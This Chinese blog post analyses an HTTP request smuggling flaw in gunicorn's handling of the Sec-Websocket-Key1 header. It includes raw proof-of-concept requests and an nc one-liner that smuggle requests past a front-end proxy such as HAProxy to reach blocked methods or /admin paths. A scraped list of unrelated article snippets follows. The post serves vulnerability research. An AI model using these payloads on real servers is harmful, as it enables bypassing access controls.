_HWHXY
_HWHXY

gunicorn走私漏洞

gunicorn走私漏洞

  • 源码:https://github.com/benoitc/gunicorn
  • 漏洞定位:https://github.com/benoitc/gunicorn/blob/20.x/gunicorn/http/message.py#142

漏洞分析

gunicorn走私漏洞_第1张图片
只要header里面存在Sec-Websocket-Key1
那么就将content_length强制赋值为8
比较简单直接构造POC

POC

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxGET /other HTTP/1.1
Host: example.com

gunicorn会认为上述请求是两个请求


GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxx


GET /other HTTP/1.1
Host: example.com

但其他的代理服务器则会认为是一个请求,因为没有Sec-Websocket-Key1的逻辑

那么借此就可以绕过gunicorn之外的一些服务器的限制

利用

gunicorn走私漏洞_第2张图片

例如前端haproxy拒绝访问POST请求,但是gunicorn可以访问
则可以利用上述POC构造

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxPOST /other HTTP/1.1
Host: example.com

关于Content-Length如何构造

gunicorn走私漏洞_第3张图片
burp开启自动更新则可以计算body的大小
关闭则可以自己repeat poc

或者使用命令行nc

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 68\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /admin HTTP/1.1\r\nHost: localhost\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 9999

这里需要自己计算不同的content-length在不同的proxy中的请求体内容。

你可能感兴趣的:(云安全,gunicorn)

  • 云上安全别掉以轻心:我在运维中踩过的那些坑与实战经验 Echo_Wish 运维探秘上线别慌运维在岗安全运维
    “云上安全别掉以轻心:我在运维中踩过的那些坑与实战经验”今天我们聊聊一个所有搞运维的人都绕不开的话题——云环境中的安全。很多人一提到“上云”,脑海里就是“省事”“弹性”“便宜”,但我想告诉你:云不是绝对安全的,甚至它带来的安全挑战比本地机房更复杂。1.为什么云安全更棘手?传统机房的安全更多是物理层和网络层,比如防火墙、机柜门锁、机房门禁;云上呢?所有东西都虚拟化了,甚至有些权限和资源不再属于你一个
  • 10、云安全框架与控制体系解析 k9l0m1 探索云安全:从理论到实践云安全安全框架数据安全
    云安全框架与控制体系解析1.云安全框架概述在云计算环境中,数据安全至关重要。为确保用户数据在云端的机密性、正确性、可用性和完整性,提出了一种安全框架和多智能体系统(MAS)架构来促进云数据存储(CDS)的安全性。1.1安全框架结构该安全框架主要由两层组成:-代理层:包含多种智能代理,负责不同的数据安全任务。-云数据存储层:用于实际的数据存储。1.2MAS架构中的智能代理MAS架构包括五种类型的代理
  • 【Gunicorn如何 管理python web应用提升并发能力】
    1、启动Django的API服务,使用gunicorn作为WSGI服务器,有什么优点和缺点?2、使用gunicorn作为WSGI服务器,能做到并行充分利用多个CPU核心吗?3、Worker进程之间还是共享一个GIL吗,还是单个Worker分别有一个GIL?使用Gunicorn作为Django项目的WSGI服务器来启动API服务,有其显著的优点和适用场景,同时也存在一些局限性,具体分析如下:一、优点
  • 88、探索云计算与云安全:基础与挑战 algae 云计算云安全入侵检测
    探索云计算与云安全:基础与挑战1云计算简介云计算作为一种创新的技术模式,近年来迅速崛起,彻底改变了企业和个人处理数据和服务的方式。它通过互联网提供计算资源和服务,使用户可以根据需求灵活地获取和释放资源,无需预先投资昂贵的硬件设备。云计算的核心理念是按需付费,类似于水电等公共服务,用户只需为实际使用的资源付费。1.1云计算的历史与发展云计算的起源可以追溯到20世纪60年代的分时系统。随着时间的推移,
  • Supervisor 入门指南一篇就够 —— 安装、项目配置与常见报错速查 逻极 python开发工具笔记python运维工具开发supervisor
    Supervisor入门指南一篇就够——安装、项目配置与常见报错速查一、Supervisor是什么在服务器进程管理中,Supervisor是一款用Python编写的进程守护与管理工具。它的核心功能是将普通的命令行进程转变为后台daemon进程,并且在进程因意外情况退出时,能够自动将其重启,保证进程的持续运行。在实际应用中,它常出现在多层架构里。比如在Nginx→Gunicorn/Django→Su
  • uWSGI, Gunicorn负载服务器怎么选 weixin_43986924 djangopython
    因为nginx等优秀的开源项目,有不少本来不是做服务器的同学也可以写很多服务器端的程序了。但是在聊天中会发现,大家虽然写了不少代码,但是对wsgi是什么,gunicorn是什么,反向代理又是什么并不了解,也就是说对基本概念并没有一个全局的了解。服务器到了服务器组你会发现原来有各种各样的服务器,那些叫法很多是有历史沉淀的,不需要太深究能对上号就行,因为本来也是乱七八糟的。HTTP服务器如果网站是HT
  • linux + 宝塔面板 部署 django网站 启动方式:uwsgi 和gunicorn如何选择 ?
    启动方式:uwsgi和gunicorn如何选择?项目uWSGIGunicorn协议uWSGI协议(可用HTTP/socket)HTTP协议启动方式命令或.ini配置文件命令参数或systemd配置兼容框架支持WSGI、uWSGI、FastCGI等仅支持WSGI性能高性能、极可调高性能、默认参数也够用配置复杂度❌比较复杂✅配置简单社区活跃⭐停滞不前,主作者不活跃⭐⭐活跃,现代化持续维护热部署支持✅支
  • 多云环境下的统一安全架构设计 TechVision大咖圈 安全架构多云安全合规性统一架构零信任深度防御身份管理
    关键词:多云安全、统一架构、零信任、深度防御、身份管理、威胁检测、SIEM、合规性文章目录引言:多云时代的安全挑战多云环境面临的安全挑战统一安全架构设计原则核心安全组件架构多层防护体系设计统一身份管理与访问控制安全监控与威胁检测实施策略与最佳实践总结与展望引言:多云时代的安全挑战在这个"云来云去"的时代,企业就像搬家一样,从单一的云服务商逐渐向多云架构迁移。就好比以前只在一家银行存钱,现在为了"不
  • 基于SASE的现代化网络安全架构 TechVision大咖圈 web安全SASE网络安全架构零信任SD-WAN云安全数字化转型
    关键词:SASE、网络安全架构、零信任、SD-WAN、云安全、数字化转型文章目录引言:网络安全的新时代传统网络架构的"痛点"SASE:安全与网络的完美融合SASE架构核心组件解析SASEvs传统架构对比SASE实施策略与最佳实践真实案例:某企业SASE转型未来展望与发展趋势引言:网络安全的新时代还记得几年前,企业的IT架构就像一座城堡,高墙围绕,护城河环绕,所有人都在城堡内安全工作。但现在呢?员工
  • docker+gunicorn+gevent部署Django项目 间歇性不想努力 dockergunicorndjango
    1、生成requiremesnts.txt文件执行pipfreeze>requirements.txt2、编写gunicorn-config.py文件frommultiprocessingimportcpu_countbind=["0.0.0.0:8521"]#daemon=Truepidfile='logs/gunicorn.pid'workers=cpu_count()*2wprker_cla
  • Nginx+Gunicorn部署Django项目 闻风听雨1562 Djangonginxgunicorndjango
    1.项目文件传输和依赖安装1.1网络环境下pip安装依赖,离线则传输安装(略)2.Django设置2.1关闭调试模式,设置允许访问IP在项目同名路径下的settings中设置DEBUG=FalseALLOWED_HOSTS=['*']#允许所有地址访问2.2配置静态文件STATIC_URL='/static/'STATIC_ROOT=os.path.join(BASE_DIR,'static')#
  • 一文读懂主流云厂商的云安全产品对比|小白也能看懂!
    ☁️一文读懂主流云厂商的云安全产品对比|小白也能看懂!云服务器是“家”,安全产品就是“门锁、摄像头、护栏”——你搭了房子,总得保护吧?无论你是初创开发者,还是企业运维,选对安全产品比你想象中更重要。但问题来了,阿里云、腾讯云、华为云这三大厂商的云安全产品看起来都差不多,到底有什么区别?作为一个云安全小白,云安全产品那么多到底是什么以及最后该怎么选?!一、安全防护到底防的是什么?很多人以为“云安全”
  • 阿里云安全访问AWS服务的极简方案:PrivateLink实战指南 ivwdcwso 运维与云原生阿里云安全awsPrivateLink跨云方案
    无需公网/IP白名单/复杂路由,三步构建跨云专属通道当你的阿里云应用需要访问AWS的S3、Lambda或数据库时,是否还在为开放公网端口、配置VPN路由而头疼?本文将用15分钟带你实现零暴露的跨云安全连接。一、为什么选择PrivateLink?假设你的业务存在以下场景:✅阿里云ECS需要读写AWSS3中的敏感数据✅跨云调用Lambda函数但要求流量不出互联网✅避免配置复杂VPN或专线传统方案痛点:
  • fastapi使用gunicorn还是uvicorn 程序员的战歌 Pythonfastapi
    Uvicorn在单进程上使用异步协程是有优势的,但是如果接口方法是同步的则走的多进程模式,也就是workers的数量,这个时候uvicorn不如gunicorn,性能上会有些限制。uvicornmain:app--host0.0.0.0--port8000--workers4Gunicorn是一个使用WSGI标准的应用服务器。Flask和Django可以直接使用Gunicorn运行,但是FastA
  • 【甲方安全视角】安全防御体系建设 秋说 网络安全安全建设
    文章目录前言一、云安全防护能力第一阶段:搭建安全防护设施第二阶段:安全防护设施的精细化运营第三阶段:安全运营周报输出二、IT安全防护能力(一)办公网安全设施建设(二)办公网安全运营三、基础安全防护能力(一)物理安全(二)运维安全(三)安全应急响应四、总结前言安全防御体系是指各类防御能力的集合,体现了业界广泛认同的“纵深防御”理念。需要特别指出的是,防护模式若过于单一,并不构成真正意义上的纵深防御。
  • 防御OSS Bucket泄露:RAM权限策略+日志审计+敏感数据扫描三重防护 大熊计算机 #阿里云网络
    1.OSS存储桶泄露的严峻态势2024年数据:阿里云安全报告显示,42%的云存储泄露事件源于权限配置错误真实案例:某金融公司因ListObjects权限开放导致6TB客户数据泄露,直接损失**$2.3M**核心矛盾:便捷访问需求与最小权限原则的冲突三重防护体系架构图(Mermaid)尝试访问非法请求合法请求异常行为定期检测泄露风险攻击者OSSBucketRAM策略拦截拒绝访问操作日志日志审计系统实
  • gunicorn多进程不死_Gunicorn 部署 Flask-Apscheduler 之踩坑记录 weixin_39834488 gunicorn多进程不死
    flask-apscheduler是一款flask的定时任务框架,其本质上是和apscheduler一样的,具体的使用操作和其他的flask组件一样。在开发环境上定时任务跑起来很顺利,但是到了生产环境用Gunicorn部署的时候出现了各种问题。踩坑一:TimeZoneoffsetdoesnotmatchsystemoffset部署生产环境时,一上去就给我丢了一个大大的异常:“TimeZoneoff
  • gunicorn多进程不死_Flask gevent 多进程WSGI(非gunicorn) weixin_39605326 gunicorn多进程不死
    python多进程gevent,FlaskgeventmultiprocessWSGI,Flaskgevent多进程WSGI,Flask多进程gevent。题外话:Flask,Instagram据说扛住了上亿日活,以前是Django。其是一个非常优秀的webservice框架,简洁灵活,可以利用大量的第三方组件和模块来快速开发。如今,Instagram的总注册用户达到30亿,月活用户超过7亿(作为
  • 10、 云安全与合规治理之道 IYA1738 云安全合规治理云原生
    云安全与合规治理之道1.引言在当今数字化转型的时代,云技术已经成为企业创新和发展的核心驱动力。随着越来越多的企业将业务迁移到云端,云安全和合规治理的重要性也日益凸显。本文将深入探讨云环境下的安全措施和治理策略,帮助读者理解如何在快速发展的云环境中保持安全,以及如何构建高效的云治理体系。2.云原生速度的安全性在云原生环境中,速度和灵活性是至关重要的优势,但也带来了新的安全挑战。云原生技术,如Kube
  • python程序部署服务器_在服务器端实现无间断部署Python应用的教程 weixin_39853892 python程序部署服务器
    当你开始着手部署应用时,最简单的方式莫过于使用管理员身份重启my_app或者所有服务,使产品升级至当前版本。开始的时候一切都很好,但是最终你会发现一旦应用启动以后,在重启期间去尝试连接会得到众多HTTP503错误。最后你可能发现Gunicorn和uWSGI可以在不关闭套接字的情况下重新加载你的应用,这样在你的应用启动时,网络请求仅仅是被延时了一点点。只要你的应用不会花费很长时间在启动上,它就会工作
  • 部署 Flask 应用到 WSGI 服务器 克里斯蒂亚诺更新 pythonflask服务器python
    部署Flask应用到WSGI服务器需要一些步骤。以下是一个基本的部署流程:安装WSGI服务器:首先,你需要选择一个WSGI服务器来部署Flask应用。常用的WSGI服务器包括Gunicorn、uWSGI等。你可以使用pip来安装它们:pipinstallgunicornpipinstallwaitress配置Flask应用:在Flask应用的根目录下创建一个名为app.py的Python文件,并编
  • 红队攻防渗透技术实战流程:云安全之云服务安全:OSS对象存储 HACKNOE 红队攻防渗透技术研习室云原生安全
    红队云攻防实战1.什么是云2.什么是云安全3.云上攻防的类型4.云服务攻防4.1什么是云服务4.2云服务安全-OSS对象存储4.2.1云服务安全-OSS对象存储各名词的概念4.2.2OSS对象存储:权限配置不当4.2.1.1OSS对象存储:公共读权限配置不当4.2.1.2OSS对象存储:公共读写直接PUT文件任意上传权限配置不当4.2.1.3OSS对象存储:bucket的授权策略ListObjec
  • 阿里云云安全中心:云时代的安全护盾 云资源服务商 网络安全阿里云云计算
    云安全的时代挑战在数字化转型的浪潮中,云计算以其卓越的灵活性、可扩展性和成本效益,成为了现代企业信息技术架构的核心支撑。越来越多的企业将业务迁移至云端,享受着按需付费、弹性扩展和全球分布的便利。然而,随着云计算的广泛应用,云安全问题也日益凸显,成为了制约云计算发展的关键因素之一。云环境的开放性与复杂性,使得传统的网络边界变得模糊。数据可能分布在世界各地的数据中心内,这给数据保护带来了巨大的挑战。云
  • 云安全与网络安全:核心区别与协同作用解析 上海云盾-高防顾问 web安全安全
    在数字化转型的浪潮中,云安全与网络安全作为信息安全的两大支柱,常被混淆但本质不同。本文将从概念、责任分工、技术手段、威胁类型等维度深入解析两者的差异,并探讨它们的协同作用。一、核心区别定义与范围网络安全:聚焦于保护传统网络环境中的数据和资源,涵盖网络设备(如路由器、防火墙)、通信协议(如TCP/IP)及终端设备(如PC、手机)的安全,核心是防止未经授权的访问和攻击(如DDoS、病毒)。云安全:覆盖
  • Python的web服务器
    1.浏览器请求动态页面过程2.WSGIPythonWebServerGatewayInterface(或简称WSGI,读作“wizgy”)。WSGI允许开发者将选择web框架和web服务器分开。可以混合匹配web服务器和web框架,选择一个适合的配对。比如,可以在Gunicorn或者Nginx/uWSGI或者Waitress上运行Django,Flask,或Pyramid。真正的混合匹配,得益于W
  • Linux云原生安全:零信任架构与机密计算 W说编程 操作系统Linux网络运维linux云原生安全系统架构网络
    Linux云原生安全:零信任架构与机密计算构建坚不可摧的云原生防御体系引言:云原生安全的范式革命随着云原生技术的普及,安全边界正在从传统的网络边界向工作负载内部转移。Gartner预测,到2025年,零信任架构将成为超过80%云原生应用的基础安全模型。本章将深入探索Linux在云原生安全领域的前沿创新,揭示如何构建从硬件到应用的纵深防御体系,有效应对日益复杂的云安全威胁。核心问题驱动:eBPF如何
  • CSA GCR 2024 | 深度解析百度大模型原生安全的系统构建
    11月15日,第八届云安全联盟大中华区大会在北京成功举办,本次大会以"云安全·AI,迎接未来"为主题,汇聚联合国科学和技术促进发展委员会主席MuhammadouM.O.Kah、中国友谊促进会理事长陈智敏、工信部国际经济技术合作中心信息化所所长李苑、云安全联盟CEOJimReavis、CSA大中华区主席李雨航等来自全球的顶尖专家和行业先锋,聚焦数字化时代的技术与安全变革,探讨云安全进入3.0时代AI
  • 云安全基础能力构建:从合规防护到自动化防御(附实战代码) 威胁棱镜 自动化运维安全aws
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录一、云安全的三大核心能力支柱二、云平台IaaS、PaaS、SaaS的架构差异二、关键能力落地实践1.云资产可视化(基础中的基础)2.合规自动化检查(CIS基准为例)3.安全策略即代码(InfrastructureasCode)三、进阶能力:构建自动化防御闭环四、云安全能力成熟度模型五、避坑指南结语一、云安全的三大核心能力支柱二
  • Python Web项目打包(Wheel)与服务器部署全流程 翔云123456 pythonpython
    目录一、本地开发环境准备二、创建`setup.py`打包配置三、创建WSGI入口文件四、打包生成Wheel文件五、服务器端部署流程1.传输文件到服务器2.服务器环境准备3.配置生产环境变量4.使用Gunicorn启动服务六、高级部署方案(Systemd服务)1.创建Systemd服务文件2.环境变量文件3.启动服务七、部署优化技巧八、版本更新流程九、方案优势以下是使用Wheel打包PythonWe
  • 构建高并发Web应用:基于Gunicorn、Flask和Docker的部署指南 concisedistinct Web开发高并发gunicornflaskdockerpythonWeb高并发部署
    目录一理解基础组件什么是Flask?什么是Gunicorn?什么是Docker?二环境准备三构建Flask应用创建项目结构编写Flask应用app/views.py四使用Gunicorn部署Flask应用配置GunicornGunicorn配置文件五使用Docker进行容器化部署编写Dockerfile构建Docker镜像运行Docker容器验证部署六优化和扩展调整Gunicorn配置使用Dock
  • ASM系列五 利用TreeApi 解析生成Class lijingyao8206 ASM字节码动态生成ClassNodeTreeAPI
       前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能,其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。          在介绍前,先要知道一点, Tree工程的接口基本可以完
  • 链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
    我们清楚:数据库设计中,表结构设计的好坏,直接影响程序的复杂度。所以,本文就无限级分类(目录)树与链表的复合在表设计中的应用进行探讨。当然,什么是树,什么是链表,这里不作介绍。有兴趣可以去看相关的教材。 需求简介: 经常遇到这样的需求,我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如,多级菜单、组织结构、商品分类。更具体的,我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
  • 为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
        在hash中查找key的时候,经常会发现用&取代%,先看两段代码吧,     JDK6中的HashMap中的indexFor方法: /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
  • 最近的情况 麦田的设计者 生活感悟计划软考
          今天是2015年4月27号      整理一下最近的思绪以及要完成的任务             1、最近在驾校科目二练车,每周四天,练三周。其实做什么都要用心,追求合理的途径解决。为
  • PHP去掉字符串中最后一个字符的方法 IT独行者 PHP字符串
    今天在PHP项目开发中遇到一个需求,去掉字符串中的最后一个字符 原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
  • hadoop在linux上单机安装过程 _wy_ linuxhadoop
    1、安装JDK     jdk版本最好是1.6以上,可以使用执行命令java -version查看当前JAVA版本号,如果报命令不存在或版本比较低,则需要安装一个高版本的JDK,并在/etc/profile的文件末尾,根据本机JDK实际的安装位置加上以下几行:    export JAVA_HOME=/usr/java/jdk1.7.0_25  
  • JAVA进阶----分布式事务的一种简单处理方法 无量 多系统交互分布式事务
    每个方法都是原子操作: 提供第三方服务的系统,要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
  • 安墨移动广 告:移动DSP厚积薄发 引领未来广 告业发展命脉 矮蛋蛋 hadoop互联网
      “谁掌握了强大的DSP技术,谁将引领未来的广 告行业发展命脉。”2014年,移动广 告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论,认为移动DSP是行业突破点,一时间许多移动广 告联盟风起云涌,竞相推出专属移动DSP产品。   到底什么是移动DSP呢?   DSP(Demand-SidePlatform),就是需求方平台,为解决广 告主投放的各种需求,真正实现人群定位的精准广
  • myelipse设置 alafqq IP
      在一个项目的完整的生命周期中,其维护费用,往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。 注释模板导入步骤  安装方法: 打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
  • java数组 百合不是茶 java数组
    java数组的   声明  创建  初始化;   java支持C语言      数组中的每个数都有唯一的一个下标 一维数组的定义 声明: int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数,下标从0开始,可以同过for来遍历数组中的数
  • javascript读取表单数据 bijian1013 JavaScript
    利用javascript读取表单数据,可以利用以下三种方法获取: 1、通过表单ID属性:var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性:var b = document.getElementsByName("name"); 3、直接通过表单名字获取:var c = form.content.
  • 探索JUnit4扩展:使用Theory bijian1013 javaJUnitTheory
    理论机制(Theory) 一.为什么要引用理论机制(Theory)         当今软件开发中,测试驱动开发(TDD — Test-driven development)越发流行。为什么 TDD 会如此流行呢?因为它确实拥有很多优点,它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点:     &nb
  • [Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
    什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装,这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate,主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射,通过注解:@Document(collectio
  • 【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
    问题: 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系?没有关系!!!   //consumers、config、brokers、cont
  • java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
           OOM异常的四种类型:       一: StackOverflowError :通常因为递归函数引起(死递归,递归太深)。-Xss 128k 一般够用。        二: out Of memory: PermGen Space:通常是动态类大多,比如web 服务器自动更新部署时引起。-Xmx
  • java-实现链表反转-递归和非递归实现 bylijinnan java
    20120422更新: 对链表中部分节点进行反转操作,这些节点相隔k个: 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。 解法: 将链表拆成两部分: a.0-&
  • Netty源码学习-DelimiterBasedFrameDecoder bylijinnan javanetty
    看DelimiterBasedFrameDecoder的API,有举例: 接收到的ChannelBuffer如下: +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后,得到: +-----+----
  • linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
    Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论 查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
  • Spring获取SessionFactory ctrain sessionFactory
    String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
  • Hive几种导出数据方式 daizj hive数据导出
    Hive几种导出数据方式   1.拷贝文件   如果数据文件恰好是用户需要的格式,那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path   2.导出到本地文件系统   --不能使用insert into local directory来导出数据,会报错 --只能使用
  • 编程之美 dcj3sjt126com 编程PHP重构
    我个人的 PHP 编程经验中,递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码,会更有利于对递归以及静态变量的理解   header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
  • Android保存用户名和密码 dcj3sjt126com android
    转自:http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目,都有用户登录功能,为了让用户的体验效果更好,我们通常会做一个功能,叫做保存用户,这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码,这里我使用3种方式来存储用户名和密码 1、通过普通 的txt文本存储 2、通过properties属性文件进行存
  • Oracle 复习笔记之同义词 eksliang Oracle 同义词Oracle synonym
    转载请出自出处:http://eksliang.iteye.com/blog/2098861 1.什么是同义词       同义词是现有模式对象的一个别名。       概念性的东西,什么是模式呢?创建一个用户,就相应的创建了 一个模式。模式是指数据库对象,是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
  • Ajax案例 gongmeitao Ajaxjsp
    数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
  • ASP.NET中Request.RawUrl、Request.Url的区别 hvt .netWebC#asp.nethovertree
      如果访问的地址是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
  • SVG 教程 (七)SVG 实例,SVG 参考手册 天梯梦 svg
    SVG 实例 在线实例 下面的例子是把SVG代码直接嵌入到HTML代码中。 谷歌Chrome,火狐,Internet Explorer9,和Safari都支持。 注意:下面的例子将不会在Opera运行,即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。   SVG 实例 SVG基本形状 一个圆 矩形 不透明矩形 一个矩形不透明2 一个带圆角矩
  • 事务管理 luyulong javaspring编程事务
    事物管理 spring事物的好处 为不同的事物API提供了一致的编程模型 支持声明式事务管理 提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED 
  • 基础数据结构和算法十一:Red-black binary search tree sunwinner AlgorithmRed-black
      The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
  • centos同步时间 stunizhengjia linux集群同步时间
    做了集群,时间的同步就显得非常必要了。 以下是查到的如何做时间同步。 在CentOS 5不再区分客户端和服务器,只要配置了NTP,它就会提供NTP服务。 1)确认已经ntp程序包: # yum install ntp 2)配置时间源(默认就行,不需要修改) # vi /etc/ntp.conf server pool.ntp.o
  • ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
    ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾:http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀):      《NFC:Arduino、Andro
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他